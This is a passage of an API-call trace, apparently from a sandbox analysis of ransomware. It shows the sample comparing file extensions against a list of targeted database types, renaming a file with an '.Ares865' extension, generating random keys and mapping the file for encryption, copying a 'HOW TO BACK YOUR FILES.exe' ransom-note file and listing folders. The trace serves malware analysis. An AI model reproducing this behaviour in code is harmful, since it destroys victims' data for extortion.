lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0089.125] lstrlenW (lpString="$er") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0089.125] lstrlenW (lpString="4dd") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0089.125] lstrlenW (lpString="4dl") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0089.125] lstrlenW (lpString="^^^") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0089.125] lstrlenW (lpString="abs") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0089.125] lstrlenW (lpString="abx") returned 3 [0089.125] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0089.125] lstrlenW (lpString="accdb") returned 5 [0089.125] lstrcmpiW (lpString1="i.dll", lpString2="accdb") returned 1 [0089.125] lstrlenW (lpString="accdc") returned 5 [0089.125] lstrcmpiW (lpString1="i.dll", lpString2="accdc") returned 1 [0089.125] lstrlenW (lpString="accde") returned 5 [0089.125] lstrcmpiW (lpString1="i.dll", lpString2="accde") returned 1 [0089.125] lstrlenW (lpString="accdr") returned 5 [0089.125] lstrcmpiW (lpString1="i.dll", lpString2="accdr") returned 1 [0089.125] lstrlenW (lpString="accdt") returned 5 [0089.126] lstrcmpiW (lpString1="i.dll", lpString2="accdt") returned 1 [0089.126] lstrlenW (lpString="accdw") returned 5 [0089.126] lstrcmpiW (lpString1="i.dll", lpString2="accdw") returned 1 [0089.126] lstrlenW (lpString="accft") returned 5 [0089.126] lstrcmpiW (lpString1="i.dll", lpString2="accft") returned 1 [0089.126] lstrlenW (lpString="adb") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0089.126] lstrlenW (lpString="adb") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0089.126] lstrlenW (lpString="ade") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0089.126] lstrlenW (lpString="adf") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0089.126] lstrlenW (lpString="adn") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0089.126] lstrlenW (lpString="adp") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0089.126] lstrlenW (lpString="alf") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0089.126] lstrlenW (lpString="ask") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0089.126] lstrlenW (lpString="btr") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0089.126] lstrlenW (lpString="cat") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0089.126] lstrlenW (lpString="cdb") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0089.126] lstrlenW (lpString="ckp") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0089.126] lstrlenW (lpString="cma") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0089.126] lstrlenW (lpString="cpd") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0089.126] lstrlenW (lpString="dacpac") returned 6 [0089.126] lstrcmpiW (lpString1="ui.dll", lpString2="dacpac") returned 1 [0089.126] lstrlenW (lpString="dad") returned 3 [0089.126] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0089.126] lstrlenW (lpString="dadiagrams") returned 10 [0089.127] lstrcmpiW (lpString1="pcrlui.dll", lpString2="dadiagrams") returned 1 [0089.127] lstrlenW (lpString="daschema") returned 8 [0089.127] lstrcmpiW (lpString1="rlui.dll", lpString2="daschema") returned 1 [0089.127] lstrlenW (lpString="db-journal") returned 10 [0089.127] lstrcmpiW (lpString1="pcrlui.dll", lpString2="db-journal") returned 1 [0089.127] lstrlenW (lpString="db-shm") returned 6 [0089.127] lstrcmpiW (lpString1="ui.dll", lpString2="db-shm") returned 1 [0089.127] lstrlenW (lpString="db-wal") returned 6 [0089.127] lstrcmpiW (lpString1="ui.dll", lpString2="db-wal") returned 1 [0089.127] lstrlenW (lpString="dbc") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0089.127] lstrlenW (lpString="dbs") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0089.127] lstrlenW (lpString="dbt") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0089.127] lstrlenW (lpString="dbv") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0089.127] lstrlenW (lpString="dbx") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0089.127] lstrlenW (lpString="dcb") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0089.127] lstrlenW (lpString="dct") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0089.127] lstrlenW (lpString="dcx") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0089.127] lstrlenW (lpString="ddl") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0089.127] lstrlenW (lpString="dlis") returned 4 [0089.127] lstrcmpiW (lpString1=".dll", lpString2="dlis") returned -1 [0089.127] lstrlenW (lpString="dp1") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0089.127] lstrlenW (lpString="dqy") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0089.127] lstrlenW (lpString="dsk") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0089.127] lstrlenW (lpString="dsn") returned 3 [0089.127] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0089.127] lstrlenW (lpString="dtsx") returned 4 [0089.128] lstrcmpiW (lpString1=".dll", lpString2="dtsx") returned -1 [0089.128] lstrlenW (lpString="dxl") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0089.128] lstrlenW (lpString="eco") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0089.128] lstrlenW (lpString="ecx") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0089.128] lstrlenW (lpString="edb") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0089.128] lstrlenW (lpString="epim") returned 4 [0089.128] lstrcmpiW (lpString1=".dll", lpString2="epim") returned -1 [0089.128] lstrlenW (lpString="fcd") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0089.128] lstrlenW (lpString="fdb") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0089.128] lstrlenW (lpString="fic") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0089.128] lstrlenW (lpString="flexolibrary") returned 12 [0089.128] lstrlenW (lpString="fm5") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0089.128] lstrlenW (lpString="fmp") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0089.128] lstrlenW (lpString="fmp12") returned 5 [0089.128] lstrcmpiW (lpString1="i.dll", lpString2="fmp12") returned 1 [0089.128] lstrlenW (lpString="fmpsl") returned 5 [0089.128] lstrcmpiW (lpString1="i.dll", lpString2="fmpsl") returned 1 [0089.128] lstrlenW (lpString="fol") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0089.128] lstrlenW (lpString="fp3") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0089.128] lstrlenW (lpString="fp4") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0089.128] lstrlenW (lpString="fp5") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0089.128] lstrlenW (lpString="fp7") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0089.128] lstrlenW (lpString="fpt") returned 3 [0089.128] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0089.129] lstrlenW (lpString="frm") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0089.129] lstrlenW (lpString="gdb") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0089.129] lstrlenW (lpString="gdb") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0089.129] lstrlenW (lpString="grdb") returned 4 [0089.129] lstrcmpiW (lpString1=".dll", lpString2="grdb") returned -1 [0089.129] lstrlenW (lpString="gwi") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0089.129] lstrlenW (lpString="hdb") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0089.129] lstrlenW (lpString="his") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0089.129] lstrlenW (lpString="ib") returned 2 [0089.129] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0089.129] lstrlenW (lpString="idb") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0089.129] lstrlenW (lpString="ihx") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0089.129] lstrlenW (lpString="itdb") returned 4 [0089.129] lstrcmpiW (lpString1=".dll", lpString2="itdb") returned -1 [0089.129] lstrlenW (lpString="itw") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0089.129] lstrlenW (lpString="jet") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0089.129] lstrlenW (lpString="jtx") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0089.129] lstrlenW (lpString="kdb") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0089.129] lstrlenW (lpString="kexi") returned 4 [0089.129] lstrcmpiW (lpString1=".dll", lpString2="kexi") returned -1 [0089.129] lstrlenW (lpString="kexic") returned 5 [0089.129] lstrcmpiW (lpString1="i.dll", lpString2="kexic") returned -1 [0089.129] lstrlenW (lpString="kexis") returned 5 [0089.129] lstrcmpiW (lpString1="i.dll", lpString2="kexis") returned -1 [0089.129] lstrlenW (lpString="lgc") returned 3 [0089.129] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0089.130] lstrlenW (lpString="lwx") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0089.130] lstrlenW (lpString="maf") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0089.130] lstrlenW (lpString="maq") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0089.130] lstrlenW (lpString="mar") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0089.130] lstrlenW (lpString="marshal") returned 7 [0089.130] lstrcmpiW (lpString1="lui.dll", lpString2="marshal") returned -1 [0089.130] lstrlenW (lpString="mas") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0089.130] lstrlenW (lpString="mav") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0089.130] lstrlenW (lpString="maw") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0089.130] lstrlenW (lpString="mdbhtml") returned 7 [0089.130] lstrcmpiW (lpString1="lui.dll", lpString2="mdbhtml") returned -1 [0089.130] lstrlenW (lpString="mdn") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0089.130] lstrlenW (lpString="mdt") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0089.130] lstrlenW (lpString="mfd") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0089.130] lstrlenW (lpString="mpd") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0089.130] lstrlenW (lpString="mrg") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0089.130] lstrlenW (lpString="mud") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0089.130] lstrlenW (lpString="mwb") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0089.130] lstrlenW (lpString="myd") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0089.130] lstrlenW (lpString="ndf") returned 3 [0089.130] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0089.130] lstrlenW (lpString="nnt") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0089.131] lstrlenW (lpString="nrmlib") returned 6 [0089.131] lstrcmpiW (lpString1="ui.dll", lpString2="nrmlib") returned 1 [0089.131] lstrlenW (lpString="ns2") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0089.131] lstrlenW (lpString="ns3") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0089.131] lstrlenW (lpString="ns4") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0089.131] lstrlenW (lpString="nsf") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0089.131] lstrlenW (lpString="nv") returned 2 [0089.131] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0089.131] lstrlenW (lpString="nv2") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0089.131] lstrlenW (lpString="nwdb") returned 4 [0089.131] lstrcmpiW (lpString1=".dll", lpString2="nwdb") returned -1 [0089.131] lstrlenW (lpString="nyf") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0089.131] lstrlenW (lpString="odb") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0089.131] lstrlenW (lpString="odb") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0089.131] lstrlenW (lpString="oqy") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0089.131] lstrlenW (lpString="ora") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0089.131] lstrlenW (lpString="orx") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0089.131] lstrlenW (lpString="owc") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0089.131] lstrlenW (lpString="p96") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0089.131] lstrlenW (lpString="p97") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0089.131] lstrlenW (lpString="pan") returned 3 [0089.131] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0089.131] lstrlenW (lpString="pdb") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0089.132] lstrlenW (lpString="pdm") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0089.132] lstrlenW (lpString="pnz") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0089.132] lstrlenW (lpString="qry") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0089.132] lstrlenW (lpString="qvd") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0089.132] lstrlenW (lpString="rbf") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0089.132] lstrlenW (lpString="rctd") returned 4 [0089.132] lstrcmpiW (lpString1=".dll", lpString2="rctd") returned -1 [0089.132] lstrlenW (lpString="rod") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0089.132] lstrlenW (lpString="rodx") returned 4 [0089.132] lstrcmpiW (lpString1=".dll", lpString2="rodx") returned -1 [0089.132] lstrlenW (lpString="rpd") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0089.132] lstrlenW (lpString="rsd") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0089.132] lstrlenW (lpString="sas7bdat") returned 8 [0089.132] lstrcmpiW (lpString1="rlui.dll", lpString2="sas7bdat") returned -1 [0089.132] lstrlenW (lpString="sbf") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0089.132] lstrlenW (lpString="scx") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0089.132] lstrlenW (lpString="sdb") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0089.132] lstrlenW (lpString="sdc") returned 3 [0089.132] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0089.133] lstrlenW (lpString="sdf") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0089.133] lstrlenW (lpString="sis") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0089.133] lstrlenW (lpString="spq") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0089.133] lstrlenW (lpString="te") returned 2 [0089.133] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0089.133] lstrlenW (lpString="teacher") returned 7 [0089.133] lstrcmpiW (lpString1="lui.dll", lpString2="teacher") returned -1 [0089.133] lstrlenW (lpString="tmd") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0089.133] lstrlenW (lpString="tps") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0089.133] lstrlenW (lpString="trc") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0089.133] lstrlenW (lpString="trc") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0089.133] lstrlenW (lpString="trm") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0089.133] lstrlenW (lpString="udb") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0089.133] lstrlenW (lpString="udl") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0089.133] lstrlenW (lpString="usr") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0089.133] lstrlenW (lpString="v12") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0089.133] lstrlenW (lpString="vis") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0089.133] lstrlenW (lpString="vpd") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0089.133] lstrlenW (lpString="vvv") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0089.133] lstrlenW (lpString="wdb") returned 3 [0089.133] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0089.133] lstrlenW (lpString="wmdb") returned 4 [0089.133] lstrcmpiW (lpString1=".dll", lpString2="wmdb") returned -1 [0089.134] lstrlenW (lpString="wrk") returned 3 [0089.134] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0089.134] lstrlenW (lpString="xdb") returned 3 [0089.134] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0089.134] lstrlenW (lpString="xld") returned 3 [0089.134] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0089.134] lstrlenW (lpString="xmlff") returned 5 [0089.134] lstrcmpiW (lpString1="i.dll", lpString2="xmlff") returned -1 [0089.134] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.Ares865") returned 60 [0089.134] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll.ares865"), dwFlags=0x1) returned 1 [0089.135] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\ppcrlui.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.135] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=254216) returned 1 [0089.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.135] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.136] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e410, lpName=0x0) returned 0x15c [0089.137] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e410) returned 0x420000 [0089.151] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.151] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.151] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.151] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.152] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.152] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0089.154] CloseHandle (hObject=0x15c) returned 1 [0089.154] CloseHandle (hObject=0x118) returned 1 [0089.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.154] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.156] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0089.156] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.156] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7cb0 [0089.156] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer" [0089.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df770 | out: hHeap=0x2b0000) returned 1 [0089.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0089.156] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Event Viewer") returned 41 [0089.156] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Event Viewer" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Event Viewer") returned="C:\\Users\\All Users\\Microsoft\\Event Viewer" [0089.156] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.156] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\event viewer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.157] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.157] GetLastError () returned 0x0 [0089.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.157] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.157] CloseHandle (hObject=0x120) returned 1 [0089.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.157] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.157] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Event Viewer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.157] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.157] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.157] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.157] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3235c810, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0x4c6cdfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c6cdfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, 